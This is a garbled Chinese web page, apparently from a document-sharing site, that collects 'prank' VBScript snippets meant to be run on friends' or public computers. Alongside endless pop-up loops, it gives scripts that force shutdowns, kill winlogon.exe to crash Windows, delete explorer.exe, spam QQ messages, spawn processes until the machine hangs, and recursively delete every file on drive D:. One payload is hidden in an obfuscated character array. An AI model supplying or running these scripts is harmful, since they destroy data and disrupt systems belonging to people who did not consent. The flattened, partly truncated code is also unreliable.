一些很恶作剧的vbs程序代码

⼀些很恶作剧的vbs程序代码操作⽅法:把代码保存为*.VBS运⾏即可经本⼈亲⾃测试不会出⼤问题的,⼀般都是利⽤⽆限循环,不是死循环,可以通过任务管理器中结束WSCRIPT或cscript进程即可。
复制代码代码如下:domsgbox "hi"loop⽆限制的⽤英⽂报数复制代码代码如下:Set s = CreateObject("sapi.spvoice")i=0dos.speak ii=i+1loop复制代码代码如下:if MsgBox("对不起,您灌⽔太多需要重新启动计算机。
"&chr(10)&"确定要重启吗?",vbOKCancel+vbInformation,"重新启动计算机")=vbCancel thenmsgbox " 系统将⽴刻重起wow ~_^",,"你上当了!!"Set objShell = CreateObject("Wscript.Shell")objShell.Run "shutdown -s -t 5",,trueend if复制代码代码如下:strs=array(13,105,102,32,77,115,103,66,111,120,40,34,-15133,-13625,-10515,-12873,-15632,-23617,34,44,118,98,89,101,115,78,111,44,34,-12363,-12877,-13087,-13634,34,41,61,118,98,121,101,115,32,116,104,101,110,32,13,10,32,32,32,32,32,32,32,32,32,32,32,109,115,103,98,111,120,32,34,-15133,89,-13899,-20026,-20319,33,34,13,10,101,108,115,101,13,10,32,32,32,32,109,115,103,98,111,120,32,34,-17479,-19781,-19504,-14129,33,33,32,-10249,-12630,-19507,-18525,-23636,-16202,-14655,-11589,-12350,-23636,-15133,-15635,-13873,-17966,-15925,35,-23644,-23647,64,35,-23644,37,64,-24147,-24147,35,-24147,-24147,63,34,44,54,52,44,34,-11825,-10536,-16721,-18202,33,33,33,33,33,33,33,33,33,34,13,10,83,101,116,32,119,115,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,115,99,114,105,112,116,46,83,104,101,108,108,34,41,32,13,10,119,115,99,114 for i=1 to UBound(strs)runner=runner&chr(strs(i))nextExecute runner这个没什么,不过加密了,⼤家可以解密试试复制代码代码如下:if MsgBox("你是猪头吗?",vbYesNo,"提⽰")=vbyes thenmsgbox "你SB啊!"elsemsgbox "还不承认!! 作为惩罚,蓝屏⼀下,你马上挂了#¥!@#¥%@……#……?",64,"严重警告"Set ws = CreateObject("Wscript.Shell")wscript.sleep 1200ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhideend if复制代码代码如下:Set ws = CreateObject("Wscript.Shell")ws.run "cmd.exe /c call calc.exe",0下⾯的是删除explorer.exe,导致桌⾯没有显⽰,不过它事先帮你备份了,为同⽬录下的explorer.Data复制代码代码如下:set ws=CreateObject("Wscript.Shell")ws.run "cmd.exe /c taskkill /f /im explorer.exe",0wscript.sleep 900ws.run "cmd.exe /c copy %windir%\explorer.exe %windir%\explorer.Data"wscript.sleep 1200ws.run "cmd.exe /c del /q /f %windir%\explorer.exe复制代码代码如下:for each wind in verybatws.sendkeys windwscript.sleep 500nextws.popup"唉:-(( ⊙ o ⊙ )!呀,我好累啊,我下了 886",30ws.popup"下机可不能忘了关QQ 我吧QQ关了哈",8ws.run "taskkill /f /im qq.exe"ws.popup"你还要上吧慢慢玩哦",27dim WSHshellset WSHshell = wscript.createobject("wscript.shell")for d=0 to 4WSHshell.SendKeys "%{F4}"nextws.run"shutdown -s -t 1000600"wscript.sleep 2000dim adoa=inputbox("请输⼊解除关机密码")if a="403746401" thenws.run"shutdown -a"msgbox"密码验证成功,enjoy the best!"exit doelsemsgbox"密码验证失败,请输⼊解除关机密码:403746401 ",vbretrycancelend ifloopws.popup"哈哈被吓到了吧好玩吧?你以为真的是病毒?呵呵O(∩_∩)O~,我还没那么打本事能做出病毒来!",57ws.popup"(\(^o^)/~ 好啦,跟你开了个⼩⼩玩笑。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
vbs整人代码大集合,收集的比较全,喜欢的朋友可以参考下。
不要搞破坏,学习vbs的朋友非常有帮助,死循环的使用比较多。
一、你打开好友的聊天对话框,然后记下在你QQ里好友的昵称,把下面代码里的xx替换一下,就可以自定义发送QQ信息到好友的次数(代码里的数字10改一下即可).xx.vbs=>复制代码代码如下:On Error Resume NextDim wsh,yeset wsh=createobject("wscript.shell")for i=1 to 10wscript.sleep 700wsh.AppActivate("与xx 聊天中")wsh.sendKeys "^v"wsh.sendKeys iwsh.sendKeys "%s"nextwscript.quitQQ骚扰信息,也可以用在其它程序上。
二、我就用这个程序放在学校图书馆查询书刊的机器上,好多人都那它没办法,哈哈------------------------------------------------------------------------------domsgbox "Y ou are foolish!"loop------------------------------------------------------------------------------三、打开无数个计算器,直到死机------------------------------------------------------------------------------set wsh=createobject("wscript.shell")dowsh.run "calc"loop-----------------------------------------------------------------------------四、直接关机-----------------------------------------------------------------------------dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "shutdown -f -s -t 00",0 ,true-----------------------------------------------------------------------------五、删除D:\所有文件---------------------------------------------------------------------------dim WSHshellset WSHshell = wscript.createobject("wscript.shell")WSHshell.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true----------------------------------------------------------------------------六、不断弹出窗口----------------------------------------------------------------------------复制代码代码如下:while(1)msgbox "哈哈你被耍了!"loop----------------------------------------------------------------------------七、不断按下alt+f4 (开什么都关闭……)---------------------------------------------------------------------------复制代码代码如下:dim WSHshellset WSHshell = wscript.createobject("wscript.shell")while(1)WSHshell.SendKeys "%{F4}"loop八、按500次回车(以上代码在运行者的电脑上显示500个对话框。
其中do until s=500 ,500可以随意更改) 复制代码代码如下:dim sdo until s=500s=s+1msgbox "郑州印刷厂,给我出现500次回车吧",64loop'------------------------ ------------------------------------------------------------九、关不掉的窗口复制代码代码如下:WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName)WScript.Echo("你是可爱的小朋吗?")WScript.Echo("哈,我想你拉,这你都不知道吗?")WScript.Echo("怎么才来,说~是不是不关心我")WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。
")WScript.Echo("小强很生气,后果很严重哦。
")WScript.Echo("嘿嘿!你也会很惨滴哦")WScript.Echo("是不是想清除我?")WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")WScript.Echo("还剩49下,快点点哦")WScript.Echo("还剩48下,快点,小笨蛋!")WScript.Echo("还剩47下对,就这样快点点!")WScript.Echo("还剩46下。
你啊就是笨,要快哦,我先不打扰你工作。
") WScript.Echo("还剩45下,记得要快哦!")WScript.Echo("还剩43下")WScript.Echo("还剩42下")WScript.Echo("还剩41下")WScript.Echo("还剩40下")WScript.Echo("还剩39下")WScript.Echo("还剩38下")WScript.Echo("还剩37下")WScript.Echo("还剩36下")WScript.Echo("还剩35下")WScript.Echo("还剩34下")WScript.Echo("还剩33下")WScript.Echo("还剩32下")WScript.Echo("还剩30下")WScript.Echo("还剩29下")WScript.Echo("还剩28下")WScript.Echo("还剩27下")WScript.Echo("还剩26下")WScript.Echo("还剩25下")WScript.Echo("还剩24下")WScript.Echo("还剩23下")WScript.Echo("还剩22下")WScript.Echo("还剩21下")WScript.Echo("还剩20下")WScript.Echo("还剩19下")WScript.Echo("还剩18下")WScript.Echo("还剩17下")WScript.Echo("还剩16下")WScript.Echo("还剩15下")WScript.Echo("还剩14下")WScript.Echo("还剩13下停停!!!慢点,我有话要说")WScript.Echo("还剩12下,你继续点我就会消失滴")WScript.Echo("还剩11下,以后就看不到我拉。
555555")WScript.Echo("还剩10下,你现在可以选择停止!")WScript.Echo("还剩9下。
你还点啊,不要我拉?")WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家")WScript.Echo("还剩7下。
疯了,你有点负意!")WScript.Echo("还剩6下。
对。
你就点吧,我恨你!")WScript.Echo("还剩5下,不明白,删除我你就好吗?")WScript.Echo("还剩4下!真要删除我?")WScript.Echo("还剩3下。
可是我真的很眷恋你。
")WScript.Echo("还剩2下。
不要这么绝情嘛,人家是爱你的!")WScript.Echo("还剩1下。
哼,既然你这么绝情。
也别怪我无义!!!") WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。
") WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("想结素我么?那你就再多点一次")WScript.Echo("郑州台历挂历?那你就再多点一次")。